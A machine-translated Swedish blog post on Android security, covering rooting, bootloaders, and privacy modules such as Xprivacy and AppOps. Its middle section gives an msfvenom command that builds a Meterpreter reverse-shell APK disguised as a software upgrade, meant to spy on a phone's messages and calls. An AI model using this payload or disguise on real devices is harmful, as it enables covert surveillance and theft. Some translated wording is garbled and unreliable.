Bildkälla: pixabay.com

Introduktion till Android

I det här ämnet kommer vi att lära oss om Android och Open Source Security (OS). Android är en Open Source-plattform. Det är ungefär som Linux, men ändå alltför annorlunda än Linux. Linux är alldeles för moget jämfört med Android. Så det här är Chetan Nayak, och välkommen till min nästa blogg om Open Source Web Security. Jag har skrivit den här bloggen förutsatt att de flesta av oss skulle använda Android K, dvs. Kitkat eller Android L, dvs. Lollipop.

Anledningen till att pepparkakor och Jellybean hade massor av säkerhetsproblem med öppen källkod som jag inte kan diskutera i den här enda bloggen. Så kanske kommer jag att diskutera det nästa gång när jag går djupare in i de äldre versionerna av Android. Så nu, låt oss hålla oss till KitKat och Lollipop.

Android designades med utvecklare i åtanke. Säkerhetskontroller utformades för att minska bördan för utvecklare. Säkerhetsbaserade utvecklare kan enkelt arbeta med och lita på flexibla säkerhetskontroller. Utvecklare som är mindre bekanta med säkerhet kommer att skyddas av säkra standardvärden.

Början

Jag var inte mycket på android förrän senare kvartalet 2013 då jag hade min första Android-mobiltelefon som var Sony Xperia L (baserad på 4.2.2 från och med då). Heck, jag hatade även Android på grund av att det var extremt laggy, särskilt Samsung-enheter. Jag övervägde till och med att köpa en Windows Lumia då, men lyckligtvis brukade jag spela en hel del spel, och jag var tvungen att köpa Xperia L eftersom den här cellen var Lag Proof. Den hade ungefär 1 gig RAM och Adreno 305. Kul nog att köra allt.

Efter att ha spelat massor av spel som NOVA3 och ModernCombat4, tröttnade jag på den cellen inom en månad. Jag visste att Android var baserat på Linux, och jag ville göra några av mina ändringar på det. Jag började läsa om anpassningar och fick reda på vad som kallades "Rooting". Eftersom jag hade en bra backhand i Linux var rooting inte ett problem med mig. Med lite hjälp från XDA kunde jag framgångsrikt rota min cell.

Men då slog något mig. Så fort min cell startade om igen efter att ha rotat, började den bara starta-looping (fast på startskärmen för alltid). Jag visste inte ens vad bootloader var i Android. Så det var inget jag kunde göra. Det var bara en månad sedan jag köpte min nya cell och min cell var nu mjukt. Jag har alltid läst att rooting är farligt, men jag visste inte att det skulle bygga min cell. Men jag hade fel. När jag fortsatte att läsa en annan sak om rooting, fick jag veta att rooting inte murar din telefon.

Rötning liknar och Admin Access i en dator (Det är faktiskt en systemåtkomst, men jag skrev Admin Access, så det är lätt att förstå för noobs.). Detta betyder att rooting aldrig kommer att tegla din telefon. Det var startladdaren som murade min telefon. För personer som inte känner till bootloader är; bootloader liknar BIOS i windows. (Om du inte vet vad BIOS är, bör du inte ens läsa tänka på säkerhet i första hand.) Bootloader eller Hboot (det är vad det heter i Android) är det första som körs när du startar upp din Android enhet.

Den paketerar instruktionerna för att starta operativsystemkärnan och de flesta av dem är specifikt utformade för att köra sin egen felsökning eller modifieringsmiljö.

Android-säkerhetskontrollen

Tänk på bootloader som säkerhetskontrollen för din enhet. Om du bryter den här kontrollpunkten kommer du att tappa allt du har på din telefon. Så det är en bra säkerhetsfunktion säger jag. För om du tappar din telefon, och någon försöker få rotåtkomst för att kringgå låset (förutsatt att du har låst din enhet med en stift eller lösenord.), Måste han tvångsfullt låsa upp startladdaren, vilket kommer att resultera i att du raderar dina data i telefon.

Så du behöver inte oroa dig för att någon missbrukar det. Så, liknande är fallet med anpassade ROMS. ROM: er är operativsystem baserade på Android-versioner specifikt utformade för din hårdvaruarkitektur. Så om du checkar på XDA för din telefon kommer du att ha ett antal anpassade ROM-skivor för dina telefoner, några av de mest kända är Cyanogen Mod ROM-skivor, som redan är förankrade och kommer med en fördefinierad uppsättning anpassningar .

Säkerhetsöverträdelsen för Android

Du tänker kanske nu, att du har en säker mobiltelefon. Men jag är här för att bevisa att du har fel igen och det är hela poängen med denna blogg. Vid det andra kvartalet 2014 hade folk redan börjat utveckla exploater och rootkits för Android, vilket kan rota dina mobiltelefoner utan att ens låsa upp startladdarna.

Inte skrämmande nog? Låt mig berätta den farligaste delen. De kunde till och med installera trojaner inuti det. Så även om polisen kan spåra cellen och du till och med får tillbaka din cell finns det fortfarande en hög risk att de kan se allt du gör på din telefon. Detta är något som jag har provat som ett experiment i en verklig praktisk miljö.

Jag använde Metasploit för den här attacken. Vad jag gjorde var att jag skapade en trojan och installerade den i måltelefonen. Det var en enkel apk-fil, och jag kallade den till en programvaruuppgradering. Så om användaren bara är en vanlig man med bara bit och byte av information om säkerhet, kommer han inte ens att våga ta bort den. Och jag såg till att närhelst internet aktiveras skulle skadlig programvara som jag skapade automatiskt köra sig själv och ansluta tillbaka till min fjärrport på värddatorn.

Följande kommandon användes för attacken (Metasploit är en penetrationstestprogramvara som hjälper till att kontrollera sårbarheter på en plattform eller specifika enheter.)

Min värd IP-adress: 192.168.xx.xx

Min värdport (för att ansluta tillbaka till): 445

>>>msfvenom

>>> msfvenom android / meterpreter / reverse_tcp LHOST = 192.168.xx.xx LPORT = 445> SoftwareUpgrade.apk

Så här skapade jag en omvänd TCP-kanal på min dator. Så varje gång internet börjar på Android kommer jag att öppna ett skal på min Kali-maskin eller den maskin där jag har installerat Metasploit.

Så nu vet du hur skrämmande det är för en person som du inte ens känner, har register över varje transaktion du gör via din cell, alla andra kontakter, WhatsApp-meddelanden, SMS, Viber och Skype-samtalslogg och allt. Om det inte är läskigt vet jag inte vad som är.

Rekommenderade kurser

  • Certifieringskurs i rubinfelsökning
  • Komplett PHP MySQL-kurs
  • Online certifieringskurs i VB.NET-programmering
  • Online-kurs om ITIL Foundation

Täckningen

Tillräckligt med säkerhetsfrågor. Vi vet alla att alla andra plattformar har säkerhetsproblem. Hur kan vi vara säkra då? Detta är inte exakt sant. Plattformar kan säkras upp till en viss punkt, men efter det är det upp till oss att se till att det förblir så. Det finns ett ökänt citat i säkerhetsvärlden:

“Social engineering: Eftersom det inte finns någon patch för mänsklig dumhet”

Jag hörde den frasen för länge sedan när jag tittade på en konferens med DefCon.

När det inte finns någon teknisk sårbarhet att utnyttja bör du försöka hacka människor. Och med det menar jag inte hypnotism och grejer. Jag menar socialteknik. Du kan läsa min andra blogg "Betydelsen av cybersäkerhet i vårt dagliga liv" för mer information om detta.

Kärnsäkerhetsfunktion för Android

Dessutom socialteknik, som är något som bara kan tas om hand om du är smart; det finns sätt att utveckla Android-applikationer på ett säkert sätt för att se till att det förblir så.

Så här är några av de viktigaste säkerhetsfunktionerna som hjälper dig att bygga säkra appar:

  • Android-applikationssandlådan, som isolerar dina appdata och kodutförande från andra appar.
  • En applikationsram med robusta implementeringar av vanliga säkerhetsfunktioner som kryptografi, behörigheter och säker IPC.
  • Ett krypterat filsystem som kan aktiveras för att skydda data på förlorade eller stulna enheter.
  • Användarbeviljade behörigheter för att begränsa åtkomst till systemfunktioner och användardata.
  • Applikationsdefinierade behörigheter för att kontrollera applikationsdata per app-basis.

Vad kan du göra om du vill ha en säker miljö men inte är en utvecklare?

Från Android 5, dvs. Lollipop, ger det en funktion där användaren kan lägga till flera profiler och begränsade lägen för att använda telefoner och surfplattor. Dessutom, om du har förankrat din telefon finns det Android-appar i Xposed-moduler som AppOps, Xprivacy eller Privacy Guard som kan hjälpa dig att ta hand om nästan allt. Du måste installera Xposed Framework för det.

Xposed Framework är det som tillåter Xposed-moduler att fungera. Xposed-moduler låter dig ändra beteendet hos Apk-filer och systemfiler utan att behöva installera en annan ROM. Det är också lätt att ångra ändringarna, så det finns lite risk här och det är inte ens tidskrävande eftersom det inte finns något behov av att flasha flera ROMS, kärnor och deras bug fixes.

Xprivacy, Privacy Guard och AppOps är exponerade moduler som gör att du kan göra din Android säker genom att välja vilken app som ska ha tillgång till vad som internet, tangentbord, sdcard, root access och massor av andra saker. Du kan till och med inaktivera åtkomst till endast specifika tjänster och skapa användardefinierade mallar för det. När det gäller mig föredrar jag att välja Xprivacy. Men här är lite information eller skillnader om du ber om att skilja mellan de tre ovan.

AppOps:

Detta introducerades ursprungligen av Google i Android 4.3. (Detta är det främsta skälet till att jag inte stöder det. Jag litar inte på Google. Kalla det Paranoia, men google spårar allt du gör. Och jag behöver inte någon för att hålla reda på allt jag gör, men om du litar på Google, kör på.). Den huvudsakliga begränsningen för AppOps är att Google bara låter dig blockera åtkomst till de appar som den vill att du ska blockera.

Det innebär om du vill blockera appar relaterade till Google, till exempel Play Services (som faktiskt förbrukar mer än 50% av ditt normala minne, batteri och data (internet)) kommer du inte att kunna. Det här är ytterligare ett skäl för mig att hata Google. Så jag tror att AppOps inte är något annat än en skadlig programvara för mig. (men det är bara jag som tänker så, det är inte om du litar på Google ensamt)

Sekretessvakt:

Privacy Guard är ett användargränssnitt som är enkelt att använda för att ersätta AppOps av Cyanogen Mod. Om du är nybörjare föreslår jag att du använder det, eftersom det bara har en växlingsknapp och självdefinierade mallar för vilken typ av app som ska ha tillgång till vad. Det här är inte så säkert om det finns en skadlig programvara som fungerar eller efterliknar sig som en systemapp. Men det är bra att komma igång.

Xprivacy:

Xprivacy är ett allt i ett verktyg. Men det riktar sig till experter. Du kan jämföra det med en schweizisk armékniv. Den har allt i sig och kan göra din telefon säker på annat sätt, men om du inte vet vad du gör kommer det bara att krossa din telefon och stoppa appar från att ens starta. Du kan också begränsa åtkomsten till systemappar. Det här är vad jag personligen föredrar att välja.

Förutom ovanstående moduler finns det till och med andra moduler som Lightening Firewall eller BootManager i Xposed, vilket kan hjälpa till att begränsa åtkomst till internet för specifika appar och stoppa appar från att starta tillsammans med systemet när du startar om en telefon.

Så det skulle vara det för den här bloggen. Vid säkerhetsproblem kan du säkert besöka eller vara medlem på XDA: s webbplats, vilket kan ge dig mycket mer information om integritet.

Rekommenderade artiklar: -

Detta har varit en guide till Android. Här diskuterade vi grundläggande koncept, säkerhetskontrollpunkter och kärnsäkerhetsfunktion för Android. Du kan också gå igenom våra andra föreslagna artiklar för att lära dig mer -

  1. Androidintervjufrågor - Topp 10 användbara frågor
  2. 8 användbara Siri-alternativ för Android
  3. 28 bästa tips och tricks för utvecklingsverktyg för Android-appar
  4. Karriärer inom Android-utveckling

Kategori: